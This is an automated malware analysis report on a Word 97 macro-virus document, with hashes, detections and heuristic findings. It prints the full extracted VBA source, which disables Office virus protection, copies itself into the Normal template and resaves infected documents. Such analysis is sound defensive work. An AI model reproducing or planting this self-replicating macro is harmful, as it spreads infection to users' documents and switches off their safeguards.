Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6506b4c48b96e83f…

MALICIOUS

Office (OLE)

30.0 KB Created: 2004-03-12 08:43:00 Authoring application: Microsoft Word 8.0 First seen: 2015-10-01
MD5: c22695dd3bbc060908435d5ae6e0f9c0 SHA-1: 7c50a25f4e6f86156184c7a5178f39f47940dbe7 SHA-256: 6506b4c48b96e83f25d5d9433f5b7bcc510f7d33f2d3512da986c6226d30a1bd
208 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that explicitly disable virus protection and copy themselves to the Normal.dot template. This behavior is indicative of a macro-based malware that aims for persistence and potential self-replication. The document body itself is a benign-looking Russian certificate, suggesting a lure.

Heuristics 4

  • ClamAV: Doc.Trojan.Quiet-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Quiet-6
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
     Application.Options.VirusProtection = False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1015 bytes
SHA-256: eedc59c0dbf7d61883599ef22b6953dc434b832f104b1f46085bacb05cfb697f
Detection
ClamAV: Doc.Trojan.Quiet-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private source As Object
Private dest As Object

Private Sub Document_Close()

End Sub

Private Sub Document_open()
 Application.Options.VirusProtection = False
 Set source = ActiveDocument.VBProject.VBComponents.Item(1)
 Set dest = NormalTemplate.VBProject.VBComponents.Item(1)
 If dest.codemodule.countoflines = 0 Then
  For i = 1 To source.codemodule.countoflines
     dest.codemodule.insertlines i, source.codemodule.lines(i, 1)
  Next i
  Application.Options.SaveNormalPrompt = False
End If

If source.codemodule.countoflines = 0 Then
 For i = 1 To dest.codemodule.countoflines
  source.codemodule.insertlines i, dest.codemodule.lines(i, 1)
 Next i
    
    
    
    ActiveDocument.SaveAs (ActiveDocument.FullName)
 End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.